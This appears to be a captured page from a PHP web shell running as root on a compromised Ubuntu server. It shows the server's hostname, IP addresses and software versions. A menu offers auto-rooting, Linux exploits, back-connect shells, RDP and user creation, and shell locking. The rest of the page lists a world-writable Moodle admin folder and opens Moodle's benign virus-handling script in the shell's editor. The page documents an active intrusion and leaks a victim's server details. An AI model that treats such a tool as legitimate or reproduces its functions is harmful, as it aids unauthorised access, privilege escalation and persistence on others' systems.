Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
cli
[ DIR ]
drwxrwxrwx
mnet
[ DIR ]
drwxrwxrwx
registration
[ DIR ]
drwxrwxrwx
roles
[ DIR ]
drwxrwxrwx
settings
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
tool
[ DIR ]
drwxrwxrwx
user
[ DIR ]
drwxrwxrwx
webservice
[ DIR ]
drwxrwxrwx
auth.php
2.8
KB
-rwxrwxrwx
auth_config.php
6.79
KB
-rwxrwxrwx
block.php
2.21
KB
-rwxrwxrwx
blocks.php
10.69
KB
-rwxrwxrwx
category.php
5.82
KB
-rwxrwxrwx
courseformats.php
4.91
KB
-rwxrwxrwx
cron.php
3.05
KB
-rwxrwxrwx
editors.php
4.08
KB
-rwxrwxrwx
enrol.php
5.74
KB
-rwxrwxrwx
environment.php
4.15
KB
-rwxrwxrwx
environment.xml
32.61
KB
-rwxrwxrwx
filters.php
10.66
KB
-rwxrwxrwx
handlevirus.php
4.83
KB
-rwxrwxrwx
index.php
20.25
KB
-rwxrwxrwx
lib.php
1.31
KB
-rwxrwxrwx
licenses.php
1.53
KB
-rwxrwxrwx
localplugins.php
3.77
KB
-rwxrwxrwx
mailout-debugger.php
2.21
KB
-rwxrwxrwx
message.php
3.48
KB
-rwxrwxrwx
modules.php
7.52
KB
-rwxrwxrwx
oacleanup.php
6.7
KB
-rwxrwxrwx
oauth2callback.php
1.66
KB
-rwxrwxrwx
phpinfo.php
0
B
-rwxrwxrwx
plagiarism.php
4.28
KB
-rwxrwxrwx
plugins.php
6.43
KB
-rwxrwxrwx
portfolio.php
8.6
KB
-rwxrwxrwx
process_email.php
1.74
KB
-rwxrwxrwx
purgecaches.php
2.27
KB
-rwxrwxrwx
qbehaviours.php
10.9
KB
-rwxrwxrwx
qtypes.php
11.31
KB
-rwxrwxrwx
renderer.php
63.01
KB
-rwxrwxrwx
reports.php
4.67
KB
-rwxrwxrwx
repository.php
16.12
KB
-rwxrwxrwx
repositoryinstance.php
5.67
KB
-rwxrwxrwx
resetemoticons.php
1.65
KB
-rwxrwxrwx
search.php
1.82
KB
-rwxrwxrwx
settings.php
4.66
KB
-rwxrwxrwx
timezone.php
1.65
KB
-rwxrwxrwx
tools.php
4.68
KB
-rwxrwxrwx
upgradesettings.php
2.34
KB
-rwxrwxrwx
user.php
17.31
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : handlevirus.php
<?php /** This expects the output from a command like * clamscan -r --infected --no-summary <files> 2>&1 | php -d error_log=/path/to/log thisfile.php * also it's important that the output of clamscan prints the FULL PATH to each infected file, so use absolute paths for area to scan * also it should be run as root, or whatever the webserver runs as so that it has the right permissions in the quarantine dir etc. * php -d error_log=/path/to/log thisfile.php will override the default error log for php cli, which is stderr, so if you want this script to just print stuff out, use php thisfile.php instead. */ die('TODO: MDL-19380'); $fd = fopen('php://stdin','r'); if (!$fd) { exit(); } require_once(dirname(dirname(__FILE__)).'/config.php'); require_once($CFG->libdir.'/eventslib.php'); require_once($CFG->dirroot.'/lib/uploadlib.php'); // contains virus handling stuff. $site = get_site(); while(!feof($fd)) { $entry = fgets($fd); if (strlen(trim($entry)) == 0) { continue; } if (!$file = validate_line($entry)) { continue; } $bits = explode('/',$file); $a->filename = $bits[count($bits)-1]; if (!$log = $DB->get_record("log", array("module"=>"upload", "info"=>$file, "action"=>"upload"))) { $a->action = clam_handle_infected_file($file,0,false); clam_replace_infected_file($file); notify_admins_unknown($file,$a); continue; } $action = clam_handle_infected_file($file,$log->userid,true); clam_replace_infected_file($file); list($ctxselect, $ctxjoin) = context_instance_preload_sql('c.id', CONTEXT_COURSE, 'ctx'); $sql = "SELECT c.id, c.fullname $ctxselect FROM {course} c $ctxjoin WHERE c.id = :courseid"; $course = $DB->get_record_sql($sql, array('courseid' => $log->course)); context_instance_preload($course); $user = $DB->get_record("user", array("id"=>$log->userid)); $subject = get_string('virusfoundsubject','moodle',format_string($site->fullname)); $a->date = userdate($log->time); $a->action = $action; $a->course = format_string($course->fullname, true, array('context' => context_course::instance($course->id))); $a->user = fullname($user); notify_user($user,$subject,$a); notify_admins($user,$subject,$a); } fclose($fd); function notify_user($user,$subject,$a) { if (!$user) { return false; } $body = get_string('virusfoundlater','moodle',$a); $eventdata = new stdClass(); $eventdata->modulename = 'moodle'; $eventdata->userfrom = get_admin(); $eventdata->userto = $user; $eventdata->subject = $subject; $eventdata->fullmessage = $body; $eventdata->fullmessageformat = FORMAT_PLAIN; $eventdata->fullmessagehtml = ''; $eventdata->smallmessage = ''; message_send($eventdata); } function notify_admins($user,$subject,$a) { $admins = get_admins(); $body = get_string('virusfoundlateradmin','moodle',$a); foreach ($admins as $admin) { $eventdata = new stdClass(); $eventdata->modulename = 'moodle'; $eventdata->userfrom = get_admin(); $eventdata->userto = $admin; $eventdata->subject = $subject; $eventdata->fullmessage = $body; $eventdata->fullmessageformat = FORMAT_PLAIN; $eventdata->fullmessagehtml = ''; $eventdata->smallmessage = ''; message_send($eventdata); } } function notify_admins_unknown($file,$a) { global $site; $admins = get_admins(); $subject = get_string('virusfoundsubject','moodle',format_string($site->fullname)); $body = get_string('virusfoundlateradminnolog','moodle',$a); foreach ($admins as $admin) { $eventdata = new stdClass(); $eventdata->modulename = 'moodle'; $eventdata->userfrom = get_admin(); $eventdata->userto = $admin; $eventdata->subject = $subject; $eventdata->fullmessage = $body; $eventdata->fullmessageformat = FORMAT_PLAIN; $eventdata->fullmessagehtml = ''; $eventdata->smallmessage = ''; message_send($eventdata); } } function validate_line($line) { global $CFG; if (strpos($line,"FOUND") === false) { return false; } $index = strpos($line,":"); $file = substr($line,0,$index); if (!(strpos($file,$CFG->dataroot) === false)) { if (!file_exists($file)) { return false; } } else { if ($file{0} == "/") { $file = $CFG->dataroot.$file; } else { $file = $CFG->dataroot."/".$file; } if (!file_exists($file)) { return false; } } // clean up $file = preg_replace('/\.\//','/',$file); $file = preg_replace('/\/\//','/',$file); return $file; }
Close